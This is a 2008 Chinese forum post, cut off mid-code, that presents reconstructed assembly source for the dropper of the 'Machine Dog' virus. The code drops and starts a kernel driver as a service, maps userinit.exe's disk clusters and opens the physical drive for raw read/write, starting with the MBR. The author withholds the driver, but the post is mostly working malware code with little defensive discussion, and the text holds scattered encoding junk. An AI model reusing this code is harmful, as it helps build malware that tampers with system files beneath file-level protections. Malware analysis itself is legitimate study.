- 論壇徽章:
- 0
|
標(biāo) 題: 逆向解毒機(jī)器狗
作 者: xcode
網(wǎng) 站:http://edu.teamsourcing.com.cn
這兩天得到了一個機(jī)器狗的病毒樣本����,周末閑來無事,便有了此篇文章��。
該病毒的殼是一種壓縮殼��,采用esp定律即可解決�。由于不是本文重點(diǎn),因此在此不作討論���。
該病毒主要包含兩部分,一部分是隱藏于exe資源中的驅(qū)動文件����。另一部分就是exe本身。為了避免不法分子將代碼用于他途���,在此只公開exe的逆向還原代碼����。 代碼如下:
.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
include advapi32.inc
includelib advapi32.lib
includelib user32.lib
includelib kernel32.lib
.data
Text db '對不起,驅(qū)動程序的加載沒有成功,程序?qū)o法運(yùn)行.',0
FileName db '\\.\PhysicalHardDisk0',0
a_Physicaldrive db '\\.\PhysicalDrive0',0
aFCJ db '分配內(nèi)存不成功',0
OutputString db '操作成功', 0
Dst db 10Ch dup(0)
hModule dd 0
ERR1 db '尋址文件不成功',0
ERR2 db '不支持的磁盤分區(qū)',0
ERR3 db '第一個分區(qū)不是啟動分區(qū)',0
ERR4 db '該文件是壓縮文件��,不能操作',0
ERR5 db '獲取文件原始信息失敗',0
ERR6 db '打開文件失敗',0
ERR7 db '加載驅(qū)動失敗',0
.code
Src db '%SystemRoot%\system32\drivers\pcihdd.sys',0
ServiceName db 'PciHdd',0
;**********************************************************************************************
;退出服務(wù)�,并刪除文件
;**********************************************************************************************
QuitService proc
LOCAL ServiceStatus
LOCAL hSCObject
LOCAL hSCManager
LOCAL @FileName[100h]:byte
push 0F003Fh ; dwDesiredAccess
push 0 ; lpDatabaseName
push 0 ; lpMachineName
call OpenSCManagerA
or eax, eax
jz OpenSCManagerFail
mov hSCManager, eax
push 0F01FFh ; dwDesiredAccess
push offset ServiceName ; " ciHdd"
push hSCManager ; hSCManager
call OpenServiceA
or eax, eax
jz OpenServiceFail
mov hSCObject, eax
lea eax, ServiceStatus
push eax ; lpServiceStatus
push 1 ; dwControl
push hSCObject ; hService
call ControlService
push hSCObject ; hService
call DeleteService
push hSCObject ; hSCObject
call CloseServiceHandle
OpenServiceFail: ; hSCObject
push hSCManager
call CloseServiceHandle
OpenSCManagerFail: ; nSize
push 100h
lea eax, @FileName
push eax ; lpDst
push offset Src ; "%SystemRoot%\\system32\\drivers\\pcihdd.sys"
call ExpandEnvironmentStringsA
lea eax, @FileName
push eax ; lpFileName
call DeleteFileA
ret
QuitService endp
;**********************************************************************************************
;從資源中加載二進(jìn)制內(nèi)容寫入文件,并將文件寫入環(huán)境變量����,然后啟動服務(wù)��,最后去掉環(huán)境變量�����,刪除文件
;**********************************************************************************************
LoadServiceFromRes proc
LOCAL ServiceStatus
LOCAL hSCObject
LOCAL hSCManager
LOCAL nNumberOfBytesToWrite
LOCAL lpBuffer
LOCAL hResInfo
LOCAL @FileName[110h]:byte
LOCAL hObject
LOCAL NumberOfBytesWritten
push 3E9h ; lpType
push 3E9h ; lpName
push hModule ; hModule
call FindResourceA
or eax, eax
jz failed
mov hResInfo, eax
push eax ; hResInfo
push hModule ; hModule
call SizeofResource
mov nNumberOfBytesToWrite, eax
push hResInfo ; hResInfo
push hModule ; hModule
call LoadResource
or eax, eax
jz failed
push eax ; hResData
call LockResource
or eax, eax
jz failed
mov lpBuffer, eax
failed:
or eax, eax
jnz CONTINUE
jmp Exit
CONTINUE: ; nSize
push 100h
lea eax, @FileName
push eax ; lpDst
push offset Src ; "%SystemRoot%\\system32\\drivers\\pcihdd.sys"
call ExpandEnvironmentStringsA
push 0 ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea eax, @FileName
push eax ; lpFileName
call CreateFileA
cmp eax, 0FFFFFFFFh
jnz short CREATEFILEOK
jmp Exit
CREATEFILEOK:
mov hObject, eax
push 0 ; lpOverlapped
lea eax, NumberOfBytesWritten
push eax ; lpNumberOfBytesWritten
push nNumberOfBytesToWrite ; nNumberOfBytesToWrite
push lpBuffer ; lpBuffer
push hObject ; hFile
call WriteFile
push hObject ; hFile
call SetEndOfFile
push hObject ; hFile
call FlushFileBuffers
push hObject ; hObject
call CloseHandle
push 0F003Fh ; dwDesiredAccess
push 0 ; lpDatabaseName
push 0 ; lpMachineName
call OpenSCManagerA
or eax, eax
jz OpenSCManagerFailed
mov hSCManager, eax
push 0 ; lpPassword
push 0 ; lpServiceStartName
push 0 ; lpDependencies
push 0 ; lpdwTagId
push 0 ; lpLoadOrderGroup
lea eax, @FileName
push eax ; lpBinaryPathName
push 0 ; dwErrorControl
push 3 ; dwStartType
push 1 ; dwServiceType
push 0 ; dwDesiredAccess
push offset ServiceName ; "ciHdd"
push offset ServiceName ; "ciHdd"
push hSCManager ; hSCManager
call CreateServiceA
or eax, eax
jz CreateServiceFailed
mov hSCObject, eax
push hSCObject ; hSCObject
call CloseServiceHandle
jmp OPENSERVICE
CreateServiceFailed:
push 0F01FFh ; dwDesiredAccess
push offset ServiceName ; "ciHdd"
push hSCManager ; hSCManager
call OpenServiceA
or eax, eax
jz short OpenServiceFailed
mov hSCObject, eax
lea eax, ServiceStatus
push eax ; lpServiceStatus
push 1 ; dwControl
push hSCObject ; hService
call ControlService
push hSCObject ; hService
call DeleteService
push hSCObject ; hSCObject
call CloseServiceHandle
OpenServiceFailed:
push 0 ; lpPassword
push 0 ; lpServiceStartName
push 0 ; lpDependencies
push 0 ; lpdwTagId
push 0 ; lpLoadOrderGroup
lea eax, @FileName
push eax ; lpBinaryPathName
push 0 ; dwErrorControl
push 3 ; dwStartType
push 1 ; dwServiceType
push 0 ; dwDesiredAccess
push offset ServiceName ; "ciHdd"
push offset ServiceName ; "ciHdd"
push hSCManager ; hSCManager
call CreateServiceA
or eax, eax
jz QUIT
mov hSCObject, eax
push hSCObject ; hSCObject
call CloseServiceHandle
jmp OPENSERVICE
QUIT:
jmp Exit
OPENSERVICE:
push 10h ; dwDesiredAccess
push offset ServiceName ; "ciHdd"
push hSCManager ; hSCManager
call OpenServiceA
or eax, eax
jz OPENSERVICEFAILED
mov hSCObject, eax
push 0 ; lpServiceArgVectors
push 0 ; dwNumServiceArgs
push hSCObject ; hService
call StartServiceA
or eax, eax
jnz StartServiceOK
jmp Exit
StartServiceOK: ; hSCObject
push hSCObject
call CloseServiceHandle
push hSCManager ; hSCObject
call CloseServiceHandle
jmp OpenSCManagerFailed
OPENSERVICEFAILED:
push hSCManager
call CloseServiceHandle
jmp Exit
OpenSCManagerFailed: ; nSize
push 100h
lea eax, @FileName
push eax ; lpDst
push offset Src ; "%SystemRoot%\\system32\\drivers\\pcihdd.sys"
call ExpandEnvironmentStringsA
lea eax, @FileName
push eax ; lpFileName
call DeleteFileA
ret
Exit:
push 10h
push 0 ; lpCaption
push offset Text ; "出錯"
push 0 ; hWnd
call MessageBoxA
push 0 ; uExitCode
call ExitProcess
LoadServiceFromRes endp
aSystemrootSyst db '%SystemRoot%\System32\Userinit.exe',0
;***************************************************************************************************************
;簇是磁盤使用的基本單元���。 組成一個簇的扇區(qū)數(shù)總是2的冪數(shù),當(dāng)卷被格式化時此數(shù)值是固定的�。 此數(shù)值稱為簇要素��,
;通常用字節(jié)引用���,如8KB,2KB�����。 NTFS通過每件事的邏輯簇數(shù)來尋址�。
;邏輯簇數(shù)(LCN):卷里的每個簇都給定了一個順序號���,這是它的邏輯簇數(shù)����。LCN0(零)指向卷的第一個簇(引導(dǎo)扇區(qū))�����。
; 用LCN乘以簇的大小就可以算出在卷里的物理偏移量����。
;
;實(shí)際簇數(shù)(VCN):一個非常駐的流的每個簇都給定了一個順序號,這是它的實(shí)際簇數(shù)�����。VCN0(零)指向這個流的第一個簇����。
; 要定位磁盤上的流,就必須把VCN轉(zhuǎn)換成LCN.這是在數(shù)據(jù)運(yùn)轉(zhuǎn)的幫助下完成的��。
;
;數(shù)據(jù)運(yùn)轉(zhuǎn):每個LCN的連續(xù)模塊都被賦予了一個數(shù)據(jù)運(yùn)轉(zhuǎn),它包含一個VCN,一個LCN和一個長度���。
; 當(dāng)NTFS需要在磁盤上找到一個對象時�,就查看數(shù)據(jù)運(yùn)轉(zhuǎn)中的VCN來得到LCN���。
;其他信息:
; 1)當(dāng)卷被格式化時可以選擇簇的大小。
; 2)一個卷的簇的大小存儲在$Boot里��。也定義了此值在一個MFT文件記錄和一個索引記錄的簇里��。
; 3)如果扇區(qū)數(shù)在用���,NTFS通過引用簇數(shù)可以尋址更大的磁盤���。
;下面是一個關(guān)于允許和默認(rèn)簇的大小的列表:
;Windows NT
; 512 bytes, 1KB, 2KB or 4KB
;Windows 2000, Windows XP
; 512 bytes, 1KB, 2KB, 4KB, 8KB, 16KB, 32KB or 64KB
;卷的大小 默認(rèn)的簇的大小
;< 512MB Sector size
;< 1GB 1KB
;< 2GB 2KB
;> 2GB 4KB
;***************************************************************************************************************
DoMyWork proc lpFileName ;成功返回值為0
LOCAL lpBuffer
LOCAL nNumberOfBytesToWrite
LOCAL hDevice
LOCAL lDistanceToMove
LOCAL HighOffset
LOCAL dwLowPartofLcn
LOCAL dwHighPartofLcn
LOCAL StartSectorC
LOCAL hFile
LOCAL PhysicalBuff[512]:BYTE
LOCAL Buffer[512]:BYTE
LOCAL OutBuffer[272]:BYTE
LOCAL dwRet
LOCAL DistanceToMoveHigh WORD
LOCAL InBuffer[8]:BYTE
LOCAL hObject
pusha
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 80000000h ; dwDesiredAccess
push offset FileName ; "[url=]\\\\.\\PhysicalHardDisk0[/url]" 是pcihdd.sys創(chuàng)建的符號鏈接
call CreateFileA
cmp eax, 0FFFFFFFFh
jz CreateFileFailed
mov hDevice, eax
push 0 ; hTemplateFile
push 20000000h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 3 ; dwShareMode
push 80000000h ; dwDesiredAccess
push lpFileName ; 打開userinit.exe
call CreateFileA
cmp eax, 0FFFFFFFFh
jz CreateUserInitFileFailed
mov hObject, eax
push 8
lea eax,InBuffer
push eax
call RtlZeroMemory
push 110h ;初始化
lea eax, OutBuffer
push eax
call RtlZeroMemory
push 0 ; lpOverlapped
lea eax, DistanceToMoveHigh
push eax ; lpBytesReturned
push 110h ; nOutBufferSize
lea eax, OutBuffer
push eax ; lpOutBuffer
push 8 ; nInBufferSize
lea eax, InBuffer
push eax ; lpInBuffer
push 90073h ; dwIoControlCode = FSCTL_GET_RETRIEVAL_POINTERS
push hObject ; hDevice
call DeviceIoControl ;通過FSCTL_GET_RETRIEVAL_POINTERS獲取userinit文件數(shù)據(jù)的分布信息
or eax, eax
jz DeviceIoControlFailed
;這個結(jié)構(gòu)是8字節(jié)對齊的,結(jié)構(gòu)長度32字節(jié)
;typedef struct RETRIEVAL_POINTERS_BUFFER
;{
; DWORD ExtentCount;
; LARGE_INTEGER StartingVcn;
; struct
; {
; LARGE_INTEGER NextVcn;
; LARGE_INTEGER Lcn;
; } Extents[1];
;} RETRIEVAL_POINTERS_BUFFER, *PRETRIEVAL_POINTERS_BUFFER;
;typedef union union
;{
; struct
; {
; DWORD LowPart;
; LONG HighPart;
; };
; LONGLONG QuadPart;
;} LARGE_INTEGER, *PLARGE_INTEGER;
lea edi, OutBuffer ;OutBuffer是上面結(jié)構(gòu)體指針
mov ebx, [edi] ;ExtentCount = Extents數(shù)組元素個數(shù)
lea edi, [edi+10h] ;指向Extents數(shù)組首地址,根據(jù)字節(jié)對齊
mov eax, DistanceToMoveHigh
or ebx, ebx ;判斷ExtentCount是否為0
jz ExtentCountIsZero
mov eax, [edi+8] ;指向Extents[0].Lcn.LowPart
mov edx, [edi+0Ch] ;指向Extents[0].Lcn.HighPart
cmp eax, 0FFFFFFFFh
jz FEIHUA
cmp edx, 0FFFFFFFFh
jz FEIHUA
mov dwLowPartofLcn, eax ;保存lcn低32位
mov dwHighPartofLcn, edx ;保存lcn高32位
push 0 ; lpOverlapped
lea eax, DistanceToMoveHigh
push eax ; lpNumberOfBytesRead
push 200h ; nNumberOfBytesToRead
lea eax, Buffer
push eax ; lpBuffer
push hObject ; hFile
call ReadFile ;讀取userinit文件開頭512字節(jié)
push hObject ; hObject
call CloseHandle
mov hObject, 0 ;關(guān)閉文件
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 3 ; dwShareMode
push 0C0000000h ; dwDesiredAccess
push offset a_Physicaldrive ; "[url=]\\\\.\\PhysicalDrive0[/url]"
call CreateFileA ;打開物理硬盤讀寫
cmp eax, 0FFFFFFFFh
jz OPENPHYSICSFAILED
mov hFile, eax
push 0 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
push 0 ; lDistanceToMove
push hFile ; hFile
call SetFilePointer ; 定位
push 0 ; lpOverlapped
lea eax, DistanceToMoveHigh
push eax ; lpNumberOfBytesRead
push 200h ; nNumberOfBytesToRead
lea eax, PhysicalBuff
push eax ; lpBuffer
push hFile ; hFile
call ReadFile ;讀取硬盤主引導(dǎo)分區(qū)MBR
; |
|
免費(fèi)注冊
發(fā)表于 2008-03-07 14:40
